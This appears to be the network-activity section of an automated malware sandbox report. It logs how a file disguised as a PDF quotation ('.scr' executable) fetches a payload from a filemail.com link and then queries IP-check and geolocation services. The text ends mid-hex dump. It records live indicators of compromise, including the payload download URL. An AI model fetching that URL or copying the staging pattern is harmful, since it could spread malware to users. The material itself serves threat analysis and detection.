Feb 14, 2025 09:20:41.397249937 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.397262096 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.397558928 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.397619009 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.397629023 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.397706032 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.397772074 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.397782087 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.397891998 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.397959948 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.397970915 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.398020029 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.398077011 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.398098946 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.398590088 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.398659945 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.398669958 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.398694038 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.398756027 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.398766041 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.398825884 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.398885965 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.398896933 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.399350882 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.399413109 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.399425030 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.399552107 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.399610043 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.399620056 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.445296049 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.482218981 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.482307911 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.482357979 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.482389927 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.482455969 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.482470036 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.484797955 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.484882116 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.484894037 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.485008001 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.485070944 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.485081911 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.485299110 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.485356092 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.485371113 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.485402107 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.485614061 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.485675097 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.485687017 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.485918999 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.485987902 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.485997915 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.486120939 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.486181021 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.486191034 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.486393929 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.486459017 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.486469984 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.486778975 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.486844063 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.486855030 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.486895084 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.486951113 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.486960888 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.487356901 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.487427950 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.487438917 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.487514019 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.487577915 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.487590075 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.487701893 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.487760067 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.487770081 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.487962008 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.488027096 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.488037109 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.488100052 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.488169909 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.488179922 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.539036989 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.571053982 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.571156025 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.571165085 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.571175098 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.571230888 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.571243048 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.573725939 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.573801994 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.573815107 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.573915958 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.573971033 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.573982000 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.574194908 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.574259043 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.574271917 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.574410915 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.574476004 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.574486017 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.574738979 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.574810982 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.574821949 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.575016975 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.575082064 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.575093031 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.575283051 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.575351000 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.575361967 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.575437069 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.575499058 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.575510025 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.575872898 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.575948000 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.575958014 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.576015949 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.576076984 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.576086998 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.576148987 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.576200962 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.576211929 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.576569080 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.576631069 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.576642036 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.576706886 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.576769114 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.576778889 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.576845884 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.576908112 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.576917887 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.617065907 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.659905910 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.660118103 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.660181046 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.660213947 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.660301924 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.660317898 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.662570000 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.662646055 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.662657022 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.662839890 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.662910938 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.662921906 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.663050890 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.663116932 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.663130045 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.663258076 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.663321972 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.663332939 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.663522959 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.663587093 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.663597107 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.663834095 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.663921118 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.663930893 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.664267063 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.664335966 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.664347887 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.664410114 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.664474964 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.664484978 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.664541960 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.664611101 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.664622068 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.664835930 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.664905071 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.664915085 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.665201902 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.665268898 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.665280104 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.665328979 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.665389061 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.665399075 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.665558100 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.665657043 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.665667057 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.665750027 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.665810108 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.665819883 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.710969925 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.749059916 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.749217033 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.749299049 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.749299049 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.749362946 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.749434948 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.751502991 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.751594067 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.751606941 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.751682043 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.751750946 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.751763105 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.751931906 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.752000093 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.752011061 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.752149105 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.752218008 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.752228975 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.752491951 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.752558947 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.752571106 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.752751112 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.752819061 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.752830982 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.752968073 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.753034115 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.753043890 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.753290892 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.753360987 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.753371000 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.753426075 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.753494024 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.753504992 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.753551006 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.753611088 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.753621101 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.753974915 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.754048109 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.754056931 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.754323006 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.754394054 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.754404068 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.754456043 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.754520893 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.754542112 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.754796982 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.754863024 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.754873991 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.804675102 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.837852001 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.838012934 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.838128090 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.838191986 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.838238001 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.838262081 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.840240955 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.840323925 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.840337992 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.840363026 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.840421915 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.845786095 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.846524954 CET	49704	80	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.851545095 CET	80	49704	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.851660967 CET	49704	80	192.168.2.5	193.30.119.107
Feb 14, 2025 09:21:31.751142979 CET	49942	80	192.168.2.5	193.122.6.168
Feb 14, 2025 09:21:31.756020069 CET	80	49942	193.122.6.168	192.168.2.5
Feb 14, 2025 09:21:31.756194115 CET	49942	80	192.168.2.5	193.122.6.168
Feb 14, 2025 09:21:31.756268978 CET	49942	80	192.168.2.5	193.122.6.168
Feb 14, 2025 09:21:31.761020899 CET	80	49942	193.122.6.168	192.168.2.5
Feb 14, 2025 09:21:32.404753923 CET	80	49942	193.122.6.168	192.168.2.5
Feb 14, 2025 09:21:32.408797026 CET	49942	80	192.168.2.5	193.122.6.168
Feb 14, 2025 09:21:32.413852930 CET	80	49942	193.122.6.168	192.168.2.5
Feb 14, 2025 09:21:32.599126101 CET	80	49942	193.122.6.168	192.168.2.5
Feb 14, 2025 09:21:32.608634949 CET	49951	443	192.168.2.5	104.21.112.1
Feb 14, 2025 09:21:32.608696938 CET	443	49951	104.21.112.1	192.168.2.5
Feb 14, 2025 09:21:32.608895063 CET	49951	443	192.168.2.5	104.21.112.1
Feb 14, 2025 09:21:32.612801075 CET	49951	443	192.168.2.5	104.21.112.1
Feb 14, 2025 09:21:32.612834930 CET	443	49951	104.21.112.1	192.168.2.5
Feb 14, 2025 09:21:32.648228884 CET	49942	80	192.168.2.5	193.122.6.168
Feb 14, 2025 09:21:33.096581936 CET	443	49951	104.21.112.1	192.168.2.5
Feb 14, 2025 09:21:33.096683025 CET	49951	443	192.168.2.5	104.21.112.1
Feb 14, 2025 09:21:33.102041006 CET	49951	443	192.168.2.5	104.21.112.1
Feb 14, 2025 09:21:33.102056026 CET	443	49951	104.21.112.1	192.168.2.5
Feb 14, 2025 09:21:33.102319956 CET	443	49951	104.21.112.1	192.168.2.5
Feb 14, 2025 09:21:33.146009922 CET	49951	443	192.168.2.5	104.21.112.1
Feb 14, 2025 09:21:33.191343069 CET	443	49951	104.21.112.1	192.168.2.5
Feb 14, 2025 09:21:33.261579037 CET	443	49951	104.21.112.1	192.168.2.5
Feb 14, 2025 09:21:33.261683941 CET	443	49951	104.21.112.1	192.168.2.5
Feb 14, 2025 09:21:33.261754990 CET	49951	443	192.168.2.5	104.21.112.1
Feb 14, 2025 09:21:33.266881943 CET	49951	443	192.168.2.5	104.21.112.1
Feb 14, 2025 09:22:37.814914942 CET	80	49942	193.122.6.168	192.168.2.5
Feb 14, 2025 09:22:37.815104008 CET	80	49942	193.122.6.168	192.168.2.5
Feb 14, 2025 09:22:37.815104961 CET	49942	80	192.168.2.5	193.122.6.168
Feb 14, 2025 09:22:37.815201998 CET	49942	80	192.168.2.5	193.122.6.168

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 14, 2025 09:20:39.123471975 CET	54614	53	192.168.2.5	1.1.1.1
Feb 14, 2025 09:20:39.133348942 CET	53	54614	1.1.1.1	192.168.2.5
Feb 14, 2025 09:21:31.739450932 CET	51942	53	192.168.2.5	1.1.1.1
Feb 14, 2025 09:21:31.746757984 CET	53	51942	1.1.1.1	192.168.2.5
Feb 14, 2025 09:21:32.600683928 CET	64701	53	192.168.2.5	1.1.1.1
Feb 14, 2025 09:21:32.607889891 CET	53	64701	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 14, 2025 09:20:39.123471975 CET	192.168.2.5	1.1.1.1	0xe07b	Standard query (0)	3007.filemail.com	A (IP address)	IN (0x0001)	false
Feb 14, 2025 09:21:31.739450932 CET	192.168.2.5	1.1.1.1	0x3de0	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Feb 14, 2025 09:21:32.600683928 CET	192.168.2.5	1.1.1.1	0xd9bb	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 14, 2025 09:20:39.133348942 CET	1.1.1.1	192.168.2.5	0xe07b	No error (0)	3007.filemail.com	ip.3007.filemail.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 14, 2025 09:20:39.133348942 CET	1.1.1.1	192.168.2.5	0xe07b	No error (0)	ip.3007.filemail.com		193.30.119.107	A (IP address)	IN (0x0001)	false
Feb 14, 2025 09:21:31.746757984 CET	1.1.1.1	192.168.2.5	0x3de0	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 14, 2025 09:21:31.746757984 CET	1.1.1.1	192.168.2.5	0x3de0	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Feb 14, 2025 09:21:31.746757984 CET	1.1.1.1	192.168.2.5	0x3de0	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Feb 14, 2025 09:21:31.746757984 CET	1.1.1.1	192.168.2.5	0x3de0	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Feb 14, 2025 09:21:31.746757984 CET	1.1.1.1	192.168.2.5	0x3de0	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Feb 14, 2025 09:21:31.746757984 CET	1.1.1.1	192.168.2.5	0x3de0	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Feb 14, 2025 09:21:32.607889891 CET	1.1.1.1	192.168.2.5	0xd9bb	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Feb 14, 2025 09:21:32.607889891 CET	1.1.1.1	192.168.2.5	0xd9bb	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Feb 14, 2025 09:21:32.607889891 CET	1.1.1.1	192.168.2.5	0xd9bb	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Feb 14, 2025 09:21:32.607889891 CET	1.1.1.1	192.168.2.5	0xd9bb	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Feb 14, 2025 09:21:32.607889891 CET	1.1.1.1	192.168.2.5	0xd9bb	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Feb 14, 2025 09:21:32.607889891 CET	1.1.1.1	192.168.2.5	0xd9bb	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Feb 14, 2025 09:21:32.607889891 CET	1.1.1.1	192.168.2.5	0xd9bb	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

3007.filemail.com

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	193.30.119.107	80	1852	C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2025 09:20:39.197093964 CET	188	OUT	GET /api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb95 HTTP/1.1 Host: 3007.filemail.com Connection: Keep-Alive
Feb 14, 2025 09:20:39.758234024 CET	593	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: https://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb95 Server: Microsoft-IIS/10.0 Date: Fri, 14 Feb 2025 08:20:38 GMT Content-Length: 274 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 33 30 30 37 2e 66 69 6c 65 6d 61 69 6c 2e 63 6f 6d 2f 61 70 69 2f 66 69 6c 65 2f 67 65 74 3f 66 69 6c 65 6b 65 79 3d 6e 4e 39 49 36 6d 4d 52 35 71 6d 54 61 63 70 67 78 67 50 5a 70 4f 54 64 59 70 2d 53 57 34 48 54 6d 56 76 4c 32 43 39 35 6e 